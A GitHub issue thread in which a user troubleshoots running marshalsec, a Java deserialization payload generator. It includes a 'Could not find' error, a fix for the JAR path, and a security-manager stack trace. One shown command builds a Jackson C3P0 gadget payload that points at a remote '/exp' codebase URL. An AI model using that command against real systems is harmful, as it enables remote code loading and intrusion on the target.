### ISSUE TITLE
Jackson not found

### ISSUE THREAD

**Issue by urmommy-c** [mbechler/marshalsec#21]
I don't know java at all, im learning c and python3 (bad combo) but I its saying Jackson not found, however maven said the build was successful, so then i use it and it says Jackson not found, Im on ubuntu 18 on the windows thing. Thanks for your help!

**Comment by urmommy-c** [comment]
Im trying to use the C3P0WrapperConnPool.java.

**Comment by mbechler** [comment]
What do you call and what is the exact error message?

**Comment by urmommy-c** [comment]
It was marshalsec.Jackson not found
root@penguin:/home/looser/marshalsec# **java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://1.1.1.1:8004/exp**
**Error: Could not find or load main class marshalsec.Jackson
Caused by: java.lang.ClassNotFoundException: marshalsec.Jackson**

**Comment by urmommy-c** [comment]
![image](https://user-images.githubusercontent.com/64172367/117051571-8d116c80-accb-11eb-8acf-c03a8de5ebba.png)

**Comment by mbechler** [comment]
Make sure marshalsec-0.0.3-SNAPSHOT-all.jar points to the actual JAR, should be target/marshalsec-0.0.3-SNAPSHOT-all.jar if cwd is the project root directory.

**Comment by urmommy-c** [comment]
Ok so that worked but now im getting this, I tried looking it up but I couldn't find anything.
access denied ("java.lang.RuntimePermission" "localeServiceProvider")

**Comment by urmommy-c** [comment]
java.security.AccessControlException: access denied ("java.lang.RuntimePermission" "localeServiceProvider")
        at java.base/java.security.AccessControlContext.checkPermission(AccessControlContext.java:472)
        at java.base/java.security.AccessController.checkPermission(AccessController.java:897)
        at java.base/java.lang.SecurityManager.checkPermission(SecurityManager.java:322)
        at marshalsec.SideEffectSecurityManager.checkPermission(SideEffectSecurityManager.java:76)
        at java.base/java.util.spi.LocaleServiceProvider.checkPermission(LocaleServiceProvider.java:157)
        at java.base/java.util.spi.LocaleServiceProvider.<init>(LocaleServiceProvider.java:171)
        at java.base/java.text.spi.DecimalFormatSymbolsProvider.<init>(DecimalFormatSymbolsProvider.java:55)
        at java.base/sun.util.locale.provider.DecimalFormatSymbolsProviderImpl.<init>(DecimalFormatSymbolsProviderImpl.java:44)
        at java.base/sun.util.locale.provider.JRELocaleProviderAdapter.lambda$getDecimalFormatSymbolsProvider$4(JRELocaleProviderAdapter.java:221)
        at java.base/java.security.AccessController.doPrivileged(Native Method)
        at java.base/sun.util.locale.provider.JRELocaleProviderAdapter.getDecimalFormatSymbolsProvider(JRELocaleProviderAdapter.java:217)
        at java.base/sun.util.locale.provider.JRELocaleProviderAdapter.getLocaleServiceProvider(JRELocaleProviderAdapter.java:101)
        at java.base/sun.util.locale.provider.LocaleProviderAdapter.findAdapter(LocaleProviderAdapter.java:281)
        at java.base/sun.util.locale.provider.LocaleProviderAdapter.getAdapter(LocaleProviderAdapter.java:250)
        at java.base/java.text.DecimalFormatSymbols.getInstance(DecimalFormatSymbols.java:178)
        at java.base/java.util.Formatter.getZero(Formatter.java:2437)
        at java.base/java.util.Formatter.<init>(Formatter.java:1956)
        at java.base/java.util.Formatter.<init>(Formatter.java:1978)
        at java.base/java.lang.String.format(String.java:2897)
        at marshalsec.MarshallerBase.createObject(MarshallerBase.java:328)
        at marshalsec.MarshallerBase.doRun(MarshallerBase.java:165)
        at marshalsec.MarshallerBase.run(MarshallerBase.java:121)
        at marshalsec.Jackson.main(Jackson.java:289)

**Comment by urmommy-c** [comment]
Nevermind i did it on my debian vm and it worked, thank you for your help!
